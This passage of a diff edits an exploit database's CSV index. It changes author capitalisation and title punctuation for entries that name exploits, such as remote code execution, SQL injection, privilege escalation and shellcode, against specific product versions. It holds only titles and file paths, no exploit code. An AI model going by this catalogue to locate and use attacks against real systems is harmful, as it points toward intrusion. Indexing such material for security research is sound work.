SEH Based Stack Overflow",2015-10-18,"yokoacc, nudragn, rungga_reksya",windows,local,0 38487,platforms/php/webapps/38487.txt,"WordPress Colormix Theme Multiple Security Vulnerablities",2013-04-21,MustLive,php,webapps,0 38488,platforms/hardware/webapps/38488.txt,"Belkin Router N150 1.00.08_ 1.00.09 - Path Traversal",2015-10-19,"Rahul Pratap Singh",hardware,webapps,0 -38489,platforms/php/remote/38489.rb,"Nibbleblog File Upload",2015-10-19,metasploit,php,remote,0 +38489,platforms/php/remote/38489.rb,"Nibbleblog File Upload",2015-10-19,Metasploit,php,remote,0 38490,platforms/multiple/dos/38490.txt,"Adobe Flash IExternalizable.writeExternal - Type Confusion",2015-10-19,"Google Security Research",multiple,dos,0 38491,platforms/php/webapps/38491.php,"SMF 'index.php' HTML injection and Multiple PHP Code Injection Vulnerabilities",2013-04-23,"Jakub Galczyk",php,webapps,0 38492,platforms/hardware/remote/38492.html,"TP-Link TL-WR1043N Router Cross Site Request Forgery",2013-04-24,"Jacob Holcomb",hardware,remote,0 @@ -34785,7 +34785,7 @@ id,file,description,date,author,platform,type,port 38502,platforms/php/webapps/38502.txt,"GetSimple CMS /admin/edit.php Multiple Parameter XSS",2013-05-01,"High-Tech Bridge",php,webapps,0 38503,platforms/php/webapps/38503.txt,"GetSimple CMS /admin/filebrowser.php Multiple Parameter XSS",2013-05-01,"High-Tech Bridge",php,webapps,0 38504,platforms/windows/local/38504.py,"HandyPassword 4.9.3 - SEH Over-Write Exploit",2015-10-21,Un_N0n,windows,local,0 -38505,platforms/php/remote/38505.rb,"Zpanel Remote Unauthenticated RCE",2015-10-21,metasploit,php,remote,0 +38505,platforms/php/remote/38505.rb,"Zpanel Remote Unauthenticated RCE",2015-10-21,Metasploit,php,remote,0 38506,platforms/php/webapps/38506.txt,"NetApp OnCommand System Manager /zapiServlet CIFS Configuration Management Interface Multiple Parameter XSS",2013-05-07,"M. Heinzl",php,webapps,0 38507,platforms/php/webapps/38507.txt,"NetApp OnCommand System Manager /zapiServlet User Management Interface Multiple Parameter XSS",2013-05-07,"M. Heinzl",php,webapps,0 38508,platforms/php/webapps/38508.txt,"MyBB Game Section Plugin 'games.php' Multiple Cross Site Scripting Vulnerabilities",2013-05-07,anonymous,php,webapps,0 @@ -34813,12 +34813,12 @@ id,file,description,date,author,platform,type,port 38532,platforms/windows/local/38532.py,"Alreader 2.5 .fb2 - SEH Based Stack Overflow (ASLR and DEP bypass)",2015-10-25,g00dv1n,windows,local,0 38533,platforms/windows/local/38533.c,"Windows 10 - pcap Driver Local Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0 38534,platforms/php/webapps/38534.php,"Joomla 3.2.x < 3.4.4 - SQL Injection",2015-10-26,"Manish Tanwar",php,webapps,0 -38535,platforms/osx/remote/38535.rb,"Safari User-Assisted Applescript Exec Attack",2015-10-26,metasploit,osx,remote,0 +38535,platforms/osx/remote/38535.rb,"Safari User-Assisted Applescript Exec Attack",2015-10-26,Metasploit,osx,remote,0 38538,platforms/multiple/dos/38538.py,"Code::Blocks Denial of Service",2013-05-29,ariarat,multiple,dos,0 38644,platforms/windows/remote/38644.txt,"Solarwinds Log and Event Manager/Trigeo SIM 6.1.0 - Remote Command Execution",2015-11-06,"Chris Graham",windows,remote,0 38645,platforms/jsp/webapps/38645.txt,"NXFilter 3.0.3 - CSRF Vulnerabilities",2015-11-06,hyp3rlinx,jsp,webapps,0 -38540,platforms/osx/local/38540.rb,"Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)",2015-10-27,metasploit,osx,local,0 -38541,platforms/php/remote/38541.rb,"Th3 MMA mma.php Backdoor Arbitrary File Upload",2015-10-27,metasploit,php,remote,80 +38540,platforms/osx/local/38540.rb,"Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit)",2015-10-27,Metasploit,osx,local,0 +38541,platforms/php/remote/38541.rb,"Th3 MMA mma.php Backdoor Arbitrary File Upload",2015-10-27,Metasploit,php,remote,80 38543,platforms/php/webapps/38543.txt,"php4dvd 'config.php' PHP Code Injection",2012-05-31,"CWH Underground",php,webapps,0 38544,platforms/php/webapps/38544.txt,"Elastix Multiple Cross Site Scripting Vulnerabilities",2013-05-28,cheki,php,webapps,0 38545,platforms/php/webapps/38545.txt,"Telaen 2.7.x Cross Site Scripting",2013-06-04,"Manuel García Cárdenas",php,webapps,0 @@ -34869,7 +34869,7 @@ id,file,description,date,author,platform,type,port 38592,platforms/php/webapps/38592.php,"Joomla! RokDownloads Component Arbitrary File Upload",2013-06-19,Am!r,php,webapps,0 38593,platforms/cgi/webapps/38593.txt,"FtpLocate HTML Injection",2013-06-24,Chako,cgi,webapps,0 38594,platforms/php/webapps/38594.txt,"Barnraiser Prairie 'get_file.php' Directory Traversal",2013-06-25,prairie,php,webapps,0 -38595,platforms/multiple/dos/38595.txt,"Oracle VM VirtualBox <= 4.0 'tracepath' Local Denial of Service",2013-06-26,"Thomas Dreibholz",multiple,dos,0 +38595,platforms/multiple/dos/38595.txt,"Oracle VM VirtualBox <= 4.0 - 'tracepath' Local Denial of Service",2013-06-26,"Thomas Dreibholz",multiple,dos,0 38596,platforms/php/webapps/38596.txt,"Xaraya Multiple Cross Site Scripting Vulnerabilities",2013-06-26,"High-Tech Bridge",php,webapps,0 38597,platforms/multiple/remote/38597.txt,"Motion Multiple Remote Security Vulnerabilities",2013-06-26,xistence,multiple,remote,0 38598,platforms/php/webapps/38598.txt,"ZamFoo 'date' Parameter Remote Command Injection",2013-06-15,localhost.re,php,webapps,0 @@ -34906,7 +34906,7 @@ id,file,description,date,author,platform,type,port 38627,platforms/android/remote/38627.sh,"Google Android 'APK' code Remote Security Bypass",2013-07-03,"Bluebox Security",android,remote,0 38628,platforms/php/webapps/38628.txt,"HostBill 'cpupdate.php' Authentication Bypass",2013-05-29,localhost.re,php,webapps,0 38629,platforms/php/webapps/38629.txt,"vBulletin 5.1.x - Remote Code Execution Exploit (Pre-Auth) (0Day)",2015-11-05,hhjj,php,webapps,0 -38642,platforms/php/webapps/38642.txt,"Serendipity 1.6.2 'serendipity_admin_image_selector.php' Cross Site Scripting",2013-07-12,"Omar Kurt",php,webapps,0 +38642,platforms/php/webapps/38642.txt,"Serendipity 1.6.2 - 'serendipity_admin_image_selector.php' Cross Site Scripting",2013-07-12,"Omar Kurt",php,webapps,0 38633,platforms/multiple/remote/38633.pl,"Intelligent Platform Management Interface Information Disclosure",2013-07-02,"Dan Farmer",multiple,remote,0 38634,platforms/ios/remote/38634.txt,"Air Drive Plus Multiple Input Vallidation Vulnerabilities",2013-07-09,"Benjamin Kunz Mejri",ios,remote,0 38635,platforms/php/webapps/38635.txt,"iVote 'details.php' SQL Injection",2013-07-10,"Ashiyane Digital Security Team",php,webapps,0 @@ -34924,13 +34924,13 @@ id,file,description,date,author,platform,type,port 38651,platforms/php/webapps/38651.txt,"eBay Magento CE <= 1.9.2.1 - Unrestricted Cron Script (Potential Code Execution / DoS)",2015-11-07,"Dawid Golunski",php,webapps,0 38652,platforms/php/webapps/38652.txt,"Google AdWords <= 6.2.0 API client libraries - XML eXternal Entity Injection (XXE)",2015-11-07,"Dawid Golunski",php,webapps,0 38653,platforms/asp/webapps/38653.txt,"Corda Highwire 'Highwire.ashx' File Path Disclosure",2013-07-12,"Adam Willard",asp,webapps,0 -38654,platforms/php/webapps/38654.txt,"OpenEMR <= 4.1 'note' Parameter HTML Injection",2013-07-12,"Nate Drier",php,webapps,0 +38654,platforms/php/webapps/38654.txt,"OpenEMR <= 4.1 - 'note' Parameter HTML Injection",2013-07-12,"Nate Drier",php,webapps,0 38655,platforms/asp/webapps/38655.txt,"Corda .NET Redirector 'redirector.corda' Cross Site Scripting",2013-07-12,"Adam Willard",asp,webapps,0 38656,platforms/php/webapps/38656.html,"PrestaShop Multiple Cross Site Request Forgery Vulnerabilities",2013-07-11,"EntPro Cyber Security Research Group",php,webapps,0 38657,platforms/hardware/webapps/38657.html,"Arris TG1682G Modem - Stored XSS",2015-11-09,Nu11By73,hardware,webapps,0 39374,platforms/osx/dos/39374.c,"OS X Kernel - IOAccelMemoryInfoUserClient Use-After-Free",2016-01-28,"Google Security Research",osx,dos,0 38659,platforms/windows/dos/38659.py,"POP Peeper 4.0.1 - SEH Over-Write",2015-11-09,Un_N0n,windows,dos,0 -38660,platforms/php/remote/38660.rb,"WordPress Ajax Load More 2.8.1.1 - PHP Upload",2015-11-09,metasploit,php,remote,0 +38660,platforms/php/remote/38660.rb,"WordPress Ajax Load More 2.8.1.1 - PHP Upload",2015-11-09,Metasploit,php,remote,0 38661,platforms/php/webapps/38661.txt,"TestLink 1.9.14 - CSRF",2015-11-09,"Aravind C Ajayan, Balagopal N",php,webapps,0 38662,platforms/multiple/dos/38662.txt,"FreeType 2.6.1 TrueType tt_sbit_decoder_load_bit_aligned Heap-Based Out-of-Bounds Read",2015-11-09,"Google Security Research",multiple,dos,0 38663,platforms/hardware/remote/38663.txt,"Huawei HG630a and HG630a-50 - Default SSH Admin Password on ADSL Modems",2015-11-10,"Murat Sahin",hardware,remote,0 @@ -34947,7 +34947,7 @@ id,file,description,date,author,platform,type,port 38674,platforms/php/webapps/38674.txt,"WordPress FlagEm Plugin 'cID' Parameter Cross Site Scripting",2013-07-22,"IeDb ir",php,webapps,0 38675,platforms/php/webapps/38675.html,"Magnolia CMS Multiple Cross Site Scripting Vulnerabilities",2013-07-24,"High-Tech Bridge",php,webapps,0 38676,platforms/php/webapps/38676.txt,"WordPress Duplicator Plugin Cross Site Scripting",2013-07-24,"High-Tech Bridge",php,webapps,0 -38677,platforms/php/webapps/38677.txt,"VBulletin <= 4.0.2 'update_order' Parameter SQL Injection",2013-07-24,n3tw0rk,php,webapps,0 +38677,platforms/php/webapps/38677.txt,"VBulletin <= 4.0.2 - 'update_order' Parameter SQL Injection",2013-07-24,n3tw0rk,php,webapps,0 38678,platforms/php/webapps/38678.txt,"WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection",2015-11-11,"Kacper Szurek",php,webapps,0 38679,platforms/php/webapps/38679.txt,"AlienVault Open Source SIEM (OSSIM) Multiple Cross Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0 38680,platforms/linux/remote/38680.html,"xmonad XMonad.Hooks.DynamicLog Module Multiple Remote Command Injection Vulnerabilities",2013-07-26,"Joachim Breitner",linux,remote,0 @@ -35000,8 +35000,8 @@ id,file,description,date,author,platform,type,port 38729,platforms/php/webapps/38729.txt,"ClipperCMS 1.3.0 - Multiple SQL Injection Vulnerabilities",2015-11-16,"Curesec Research Team",php,webapps,80 38730,platforms/php/remote/38730.py,"ClipperCMS 1.3.0 - Code Execution",2015-11-16,"Curesec Research Team",php,remote,80 38731,platforms/php/remote/38731.py,"XCart 5.2.6 - Code Execution",2015-11-16,"Curesec Research Team",php,remote,80 -38732,platforms/php/remote/38732.rb,"Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload",2015-11-16,metasploit,php,remote,9999 -38733,platforms/php/remote/38733.rb,"Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload",2015-11-16,metasploit,php,remote,9999 +38732,platforms/php/remote/38732.rb,"Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload",2015-11-16,Metasploit,php,remote,9999 +38733,platforms/php/remote/38733.rb,"Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload",2015-11-16,Metasploit,php,remote,9999 38734,platforms/windows/dos/38734.txt,"Kaspersky Antivirus - Certificate Handling Path Traversal",2015-11-16,"Google Security Research",windows,dos,0 38735,platforms/windows/dos/38735.txt,"Kaspersky Antivirus - DEX File Format Memory Corruption",2015-11-16,"Google Security Research",windows,dos,0 38736,platforms/windows/dos/38736.txt,"Kaspersky Antivirus - ZIP File Format Use-After-Free",2015-11-16,"Google Security Research",windows,dos,0 @@ -35031,7 +35031,7 @@ id,file,description,date,author,platform,type,port 38761,platforms/windows/dos/38761.py,"Sam Spade 1.14 - Decode URL Buffer Overflow Crash PoC",2015-11-19,"Vivek Mahajan",windows,dos,0 38762,platforms/windows/webapps/38762.txt,"Netwin SurgeFTP Sever 23d6 - Stored Cross Site Scripting Vulnerabilities",2015-11-19,Un_N0n,windows,webapps,0 38763,platforms/lin_x86/dos/38763.txt,"Chrome - open-vcdiff OOB Read in Browser Process Integer Overflow",2015-11-19,"Google Security Research",lin_x86,dos,0 -38764,platforms/hardware/remote/38764.rb,"F5 iControl iCall::Script Root Command Execution",2015-11-19,metasploit,hardware,remote,443 +38764,platforms/hardware/remote/38764.rb,"F5 iControl iCall::Script Root Command Execution",2015-11-19,Metasploit,hardware,remote,443 38765,platforms/php/webapps/38765.txt,"Horde Groupware 5.2.10 - CSRF",2015-11-19,"High-Tech Bridge SA",php,webapps,80 38766,platforms/multiple/remote/38766.java,"Mozilla Firefox <= 9.0.1 Same Origin Policy Security Bypass",2013-09-17,"Takeshi Terada",multiple,remote,0 38767,platforms/php/webapps/38767.txt,"WordPress RokIntroScroller Plugin 'thumb.php' Multiple Security Vulnerabilities",2013-09-19,MustLive,php,webapps,0 @@ -35040,10 +35040,10 @@ id,file,description,date,author,platform,type,port 38770,platforms/php/webapps/38770.txt,"MentalJS Sandbox Security Bypass",2013-09-20,"Rafay Baloch",php,webapps,0 38771,platforms/windows/dos/38771.py,"ShareKM Remote Denial of Service",2013-09-22,"Yuda Prawira",windows,dos,0 38773,platforms/hardware/webapps/38773.txt,"ZTE ZXHN H108N R1A_ ZXV10 W300 Routers - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,0 -38781,platforms/php/webapps/38781.txt,"AlienVault Open Source SIEM (OSSIM) 3.1 'date_from' Parameter Multiple SQL Injection Vulnerabilities",2013-10-02,"Yu-Chi Ding",php,webapps,0 +38781,platforms/php/webapps/38781.txt,"AlienVault Open Source SIEM (OSSIM) 3.1 - 'date_from' Parameter Multiple SQL Injection Vulnerabilities",2013-10-02,"Yu-Chi Ding",php,webapps,0 38803,platforms/php/webapps/38803.txt,"WP-Client 3.8.7 - Stored XSS",2015-11-24,"Pier-Luc Maltais",php,webapps,80 38782,platforms/php/webapps/38782.php,"WordPress SEO Watcher Plugin 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-03,wantexz,php,webapps,0 -38775,platforms/linux/local/38775.rb,"Chkrootkit - Local Privilege Escalation",2015-11-20,metasploit,linux,local,0 +38775,platforms/linux/local/38775.rb,"Chkrootkit - Local Privilege Escalation",2015-11-20,Metasploit,linux,local,0 38776,platforms/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",cgi,webapps,0 38777,platforms/php/webapps/38777.txt,"Joomla! JVideoClip Component 'uid' Parameter SQL Injection",2013-09-21,SixP4ck3r,php,webapps,0 38778,platforms/linux/dos/38778.txt,"Blue Coat ProxySG 5.x and Security Gateway OS Denial Of Service",2013-09-23,anonymous,linux,dos,0 @@ -35051,7 +35051,7 @@ id,file,description,date,author,platform,type,port 38780,platforms/php/webapps/38780.txt,"SilverStripe Multiple HTML Injection Vulnerabilities",2013-09-23,"Benjamin Kunz Mejri",php,webapps,0 38783,platforms/php/webapps/38783.php,"WordPress Woopra Analytics Plugin 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-07,wantexz,php,webapps,0 38784,platforms/php/webapps/38784.txt,"AlienVault Open Source SIEM (OSSIM) 'timestamp' Parameter Directory Traversal",2013-10-08,"Ding Yu-Chi",php,webapps,0 -38785,platforms/php/webapps/38785.pl,"vBulletin 4.1.x '/install/upgrade.php' Security Bypass",2013-10-13,"Joshua Rogers",php,webapps,0 +38785,platforms/php/webapps/38785.pl,"vBulletin 4.1.x - '/install/upgrade.php' Security Bypass",2013-10-13,"Joshua Rogers",php,webapps,0 38786,platforms/php/webapps/38786.txt,"Ziteman CMS Login Page SQL Injection",2013-10-10,"Ashiyane Digital Security Team",php,webapps,0 38787,platforms/windows/dos/38787.txt,"Acrobat Reader DC 15.008.20082.15957 - PDF Parsing Memory Corruption",2015-11-23,"Francis Provencher",windows,dos,0 38788,platforms/windows/dos/38788.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption",2015-11-23,"Francis Provencher",windows,dos,0 @@ -35063,7 +35063,7 @@ id,file,description,date,author,platform,type,port 38794,platforms/windows/dos/38794.txt,"Windows Cursor Object Potential Memory Leak (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 38795,platforms/windows/dos/38795.txt,"Windows Race Condition DestroySMWP Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 38796,platforms/windows/dos/38796.txt,"Windows Kernel - Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 -38797,platforms/php/remote/38797.rb,"Joomla Content History SQLi Remote Code Execution",2015-11-23,metasploit,php,remote,80 +38797,platforms/php/remote/38797.rb,"Joomla Content History SQLi Remote Code Execution",2015-11-23,Metasploit,php,remote,80 38798,platforms/multiple/dos/38798.txt,"Mozilla Firefox Cookie Verification Denial of Service",2013-04-04,anonymous,multiple,dos,0 38799,platforms/php/webapps/38799.txt,"BilboPlanet 'auth.php' SQL Injection",2013-10-11,"Omar Kurt",php,webapps,0 38800,platforms/php/webapps/38800.txt,"FreeSMS pages/crc_handler.php scheduleid Parameter SQL Injection",2013-09-27,"Sarahma Security",php,webapps,0 @@ -35082,7 +35082,7 @@ id,file,description,date,author,platform,type,port 38814,platforms/php/webapps/38814.php,"Joomla! Maian15 Component 'name' Parameter Arbitrary Shell Upload",2013-10-20,SultanHaikal,php,webapps,0 38815,platforms/lin_x86-64/shellcode/38815.c,"Linux/x86-64 - Polymorphic execve Shellcode (31 bytes)",2015-11-25,d4sh&r,lin_x86-64,shellcode,0 38816,platforms/jsp/webapps/38816.html,"JReport 'dealSchedules.jsp' Cross-Site Request Forgery",2013-10-25,"Poonam Singh",jsp,webapps,0 -38817,platforms/linux/local/38817.txt,"Poppler <= 0.14.3 '/utils/pdfseparate.cc' Local Format String",2013-10-26,"Daniel Kahn Gillmor",linux,local,0 +38817,platforms/linux/local/38817.txt,"Poppler <= 0.14.3 - '/utils/pdfseparate.cc' Local Format String",2013-10-26,"Daniel Kahn Gillmor",linux,local,0 38818,platforms/multiple/remote/38818.xml,"Openbravo ERP - XML External Entity Information Disclosure",2013-10-30,"Tod Beardsley",multiple,remote,0 38819,platforms/php/webapps/38819.txt,"Course Registration Management System Cross Site Scripting and SQL Injection Vulnerabilities",2013-10-21,"Omar Kurt",php,webapps,0 38820,platforms/php/webapps/38820.php,"WordPress This Way Theme 'upload_settings_image.php' Arbitrary File Upload",2013-11-01,Bet0,php,webapps,0 @@ -35110,7 +35110,7 @@ id,file,description,date,author,platform,type,port 38846,platforms/multiple/remote/38846.txt,"nginx <= 1.1.17 URI Processing Security Bypass",2013-11-19,"Ivan Fratric",multiple,remote,0 38847,platforms/windows/local/38847.py,"Acunetix WVS 10 - Local Privilege Escalation",2015-12-02,"Daniele Linguaglossa",windows,local,0 38848,platforms/php/webapps/38848.php,"WordPress Suco Themes 'themify-ajax.php' Arbitrary File Upload",2013-11-20,DevilScreaM,php,webapps,0 -38849,platforms/cgi/remote/38849.rb,"Advantech Switch - Bash Environment Variable Code Injection (Shellshock)",2015-12-02,metasploit,cgi,remote,0 +38849,platforms/cgi/remote/38849.rb,"Advantech Switch - Bash Environment Variable Code Injection (Shellshock)",2015-12-02,Metasploit,cgi,remote,0 38850,platforms/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics Remote Code Injection",2013-11-22,"Eduardo Gonzalez",hardware,remote,0 38851,platforms/hardware/remote/38851.html,"LevelOne WBR-3406TX Router Cross Site Request Forgery",2013-11-15,"Yakir Wizman",hardware,remote,0 38852,platforms/php/webapps/38852.pl,"phpThumb 'phpThumb.php' Arbitrary File Upload",2013-12-01,DevilScreaM,php,webapps,0 @@ -35120,8 +35120,8 @@ id,file,description,date,author,platform,type,port 38856,platforms/php/webapps/38856.txt,"WordPress Users Ultra Plugin 1.5.50 - Persistent XSS",2015-12-03,"Panagiotis Vagenas",php,webapps,0 38857,platforms/linux/dos/38857.txt,"Gnome Nautilus 3.16 - Denial of Service",2015-12-03,"Panagiotis Vagenas",linux,dos,0 38858,platforms/windows/dos/38858.txt,"Malwarebytes Antivirus 2.2.0 - DoS PoC",2015-12-03,"Francis Provencher",windows,dos,0 -38859,platforms/windows/remote/38859.rb,"Oracle BeeHive 2 voice-servlet processEvaluation()",2015-12-03,metasploit,windows,remote,7777 -38860,platforms/windows/remote/38860.rb,"Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload",2015-12-03,metasploit,windows,remote,7777 +38859,platforms/windows/remote/38859.rb,"Oracle BeeHive 2 voice-servlet processEvaluation()",2015-12-03,Metasploit,windows,remote,7777 +38860,platforms/windows/remote/38860.rb,"Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload",2015-12-03,Metasploit,windows,remote,7777 38861,platforms/php/webapps/38861.txt,"WordPress Gwolle Guestbook Plugin 1.5.3 - Remote File Inclusion",2015-12-03,"High-Tech Bridge SA",php,webapps,0 38862,platforms/php/webapps/38862.txt,"Enorth Webpublisher CMS 'thisday' Parameter SQL Injection",2013-12-06,xin.wang,php,webapps,0 38863,platforms/php/webapps/38863.php,"NeoBill /modules/nullregistrar/phpwhois/example.php query Parameter Remote Code Execution",2013-12-06,KedAns-Dz,php,webapps,0 @@ -35159,12 +35159,12 @@ id,file,description,date,author,platform,type,port 38897,platforms/xml/webapps/38897.txt,"OpenMRS 2.3 (1.11.4) - Expression Language Injection",2015-12-08,LiquidWorm,xml,webapps,0 38898,platforms/xml/webapps/38898.txt,"OpenMRS 2.3 (1.11.4) - Multiple Cross-Site Scripting Vulnerabilities",2015-12-08,LiquidWorm,xml,webapps,0 38899,platforms/xml/webapps/38899.txt,"OpenMRS 2.3 (1.11.4) - Local File Disclosure",2015-12-08,LiquidWorm,xml,webapps,0 -38900,platforms/php/remote/38900.rb,"phpFileManager 0.9.8 Remote Code Execution",2015-12-08,metasploit,php,remote,80 +38900,platforms/php/remote/38900.rb,"phpFileManager 0.9.8 Remote Code Execution",2015-12-08,Metasploit,php,remote,80 38901,platforms/php/webapps/38901.txt,"PHP Utility Belt - Remote Code Execution",2015-12-08,WICS,php,webapps,80 38902,platforms/php/webapps/38902.txt,"WordPress Polls Widget Plugin 1.0.7 - SQL Injection",2015-12-08,WICS,php,webapps,80 38903,platforms/windows/local/38903.txt,"iniNet SpiderControl SCADA Web Server Service 2.02 - Insecure File Permissions",2015-12-08,LiquidWorm,windows,local,0 38904,platforms/windows/local/38904.txt,"iniNet SpiderControl PLC Editor Simatic 6.30.04 - Insecure File Permissions",2015-12-08,LiquidWorm,windows,local,0 -38905,platforms/multiple/remote/38905.rb,"Atlassian HipChat for Jira Plugin Velocity Template Injection",2015-12-08,metasploit,multiple,remote,8080 +38905,platforms/multiple/remote/38905.rb,"Atlassian HipChat for Jira Plugin Velocity Template Injection",2015-12-08,Metasploit,multiple,remote,8080 38906,platforms/php/webapps/38906.txt,"dotCMS 3.2.4 - Multiple Vulnerabilities",2015-12-08,LiquidWorm,php,webapps,80 38907,platforms/php/webapps/38907.txt,"Osclass Multiple Input Validation Vulnerabilities",2013-12-14,R3d-D3V!L,php,webapps,0 38908,platforms/php/webapps/38908.txt,"Leed 'id' Parameter SQL Injection",2013-12-18,"Alexandre Herzog",php,webapps,0 @@ -35183,7 +35183,7 @@ id,file,description,date,author,platform,type,port 38921,platforms/php/webapps/38921.txt,"AFCommerce /afcontrol/adminpassword.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 38922,platforms/php/webapps/38922.txt,"AFCommerce /afcontrol/controlheader.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 38923,platforms/windows/remote/38923.txt,"Apple Safari For Windows PhishingAlert Security Bypass Weakness",2013-12-07,Jackmasa,windows,remote,0 -38924,platforms/php/webapps/38924.txt,"WordPress 2.0.11 '/wp-admin/options-discussion.php' Script Cross Site Request Forgery",2013-12-17,MustLive,php,webapps,0 +38924,platforms/php/webapps/38924.txt,"WordPress 2.0.11 - '/wp-admin/options-discussion.php' Script Cross Site Request Forgery",2013-12-17,MustLive,php,webapps,0 38927,platforms/php/webapps/38927.txt,"iy10 Dizin Scripti - Multiple Vulnerabilities",2015-12-10,KnocKout,php,webapps,80 38928,platforms/php/webapps/38928.txt,"Gökhan Balbal Script 2.0 - CSRF",2015-12-10,KnocKout,php,webapps,80 38929,platforms/hardware/webapps/38929.txt,"Skybox Platform <=7.0.611 - Multiple Vulnerabilities",2015-12-10,"SEC Consult",hardware,webapps,8443 @@ -35196,8 +35196,8 @@ id,file,description,date,author,platform,type,port 38936,platforms/php/webapps/38936.txt,"Advanced Dewplayer Plugin for WordPress 'download-file.php' Script Directory Traversal",2013-12-30,"Henri Salo",php,webapps,0 38937,platforms/linux/local/38937.txt,"Apache Libcloud Digital Ocean API Local Information Disclosure",2014-01-01,anonymous,linux,local,0 38938,platforms/php/webapps/38938.txt,"xBoard 'post' Parameter Local File Include",2013-12-24,"TUNISIAN CYBER",php,webapps,0 -38939,platforms/multiple/dos/38939.c,"VLC Media Player 1.1.11 '.NSV' File Denial of Service",2012-03-14,"Dan Fosco",multiple,dos,0 -38940,platforms/multiple/dos/38940.c,"VLC Media Player 1.1.11 '.EAC3' File Denial of Service",2012-03-14,"Dan Fosco",multiple,dos,0 +38939,platforms/multiple/dos/38939.c,"VLC Media Player 1.1.11 - '.NSV' File Denial of Service",2012-03-14,"Dan Fosco",multiple,dos,0 +38940,platforms/multiple/dos/38940.c,"VLC Media Player 1.1.11 - '.EAC3' File Denial of Service",2012-03-14,"Dan Fosco",multiple,dos,0 38941,platforms/php/webapps/38941.txt,"GoAutoDial CE 3.3 - Multiple Vulnerabilities",2015-12-12,R-73eN,php,webapps,0 38942,platforms/php/webapps/38942.txt,"SPAMINA Cloud Email Firewall Directory Traversal",2013-10-03,"Sisco Barrera",php,webapps,0 38943,platforms/php/webapps/38943.txt,"Joomla! Aclsfgpl Component 'index.php' Arbitrary File Upload",2014-01-07,"TUNISIAN CYBER",php,webapps,0 @@ -35230,8 +35230,8 @@ id,file,description,date,author,platform,type,port 38970,platforms/multiple/dos/38970.txt,"Adobe Flash Type Confusion in Serialization with ObjectEncoder.dynamicPropertyWriter",2015-12-14,"Google Security Research",multiple,dos,0 38971,platforms/hardware/webapps/38971.txt,"Polycom VVX-Series Business Media Phones - Path Traversal",2015-12-14,"Jake Reynolds",hardware,webapps,80 38972,platforms/windows/dos/38972.html,"Internet Explorer 11 - MSHTML!CObjectElement Use-After-Free (MS15-124)",2015-12-14,"Moritz Jodeit",windows,dos,0 -38973,platforms/multiple/remote/38973.rb,"Legend Perl IRC Bot Remote Code Execution",2015-12-14,metasploit,multiple,remote,0 -38974,platforms/multiple/remote/38974.rb,"Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution",2015-12-14,metasploit,multiple,remote,0 +38973,platforms/multiple/remote/38973.rb,"Legend Perl IRC Bot Remote Code Execution",2015-12-14,Metasploit,multiple,remote,0 +38974,platforms/multiple/remote/38974.rb,"Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution",2015-12-14,Metasploit,multiple,remote,0 38975,platforms/php/webapps/38975.txt,"Bitrix bitrix.mpbuilder Module 1.0.10 - Local File Inclusion",2015-12-14,"High-Tech Bridge SA",php,webapps,80 38976,platforms/php/webapps/38976.txt,"Bitrix bitrix.xscan Module 1.0.3 - Directory Traversal",2015-12-14,"High-Tech Bridge SA",php,webapps,80 38977,platforms/php/webapps/38977.py,"Joomla 1.5 < 3.4.5 - Object Injection Remote Command Execution",2015-12-15,Sec-1,php,webapps,0 @@ -35239,8 +35239,8 @@ id,file,description,date,author,platform,type,port 38979,platforms/windows/dos/38979.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_SetConfFileChunk Stack Buffer Overflow",2015-12-15,"Ptrace Security",windows,dos,11460 38980,platforms/windows/dos/38980.py,"IBM Tivoli Storage Manager FastBack Server 5.5.4.2 - _FXCLI_GetConfFileChunk Stack Buffer Overflow",2015-12-15,"Ptrace Security",windows,dos,11460 38981,platforms/php/webapps/38981.txt,"Ovidentia absences Module 2.64 - Remote File Inclusion",2015-12-15,bd0rk,php,webapps,80 -38982,platforms/jsp/remote/38982.rb,"ManageEngine Desktop Central 9 FileUploadServlet ConnectionId",2015-12-15,metasploit,jsp,remote,8020 -38983,platforms/java/remote/38983.rb,"Jenkins CLI RMI Java Deserialization",2015-12-15,metasploit,java,remote,8080 +38982,platforms/jsp/remote/38982.rb,"ManageEngine Desktop Central 9 FileUploadServlet ConnectionId",2015-12-15,Metasploit,jsp,remote,8020 +38983,platforms/java/remote/38983.rb,"Jenkins CLI RMI Java Deserialization",2015-12-15,Metasploit,java,remote,8080 38984,platforms/php/webapps/38984.txt,"Tequila File Hosting 1.5 - Multiple Vulnerabilities",2015-12-15,"Ashiyane Digital Security Team",php,webapps,80 38985,platforms/php/webapps/38985.txt,"Dredge School Administration System /DSM/loader.php Id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 38986,platforms/php/webapps/38986.txt,"Dredge School Administration System /DSM/loader.php Account Information Disclosure",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -35356,13 +35356,13 @@ id,file,description,date,author,platform,type,port 39103,platforms/windows/dos/39103.txt,"AccessDiver 4.301 - Buffer 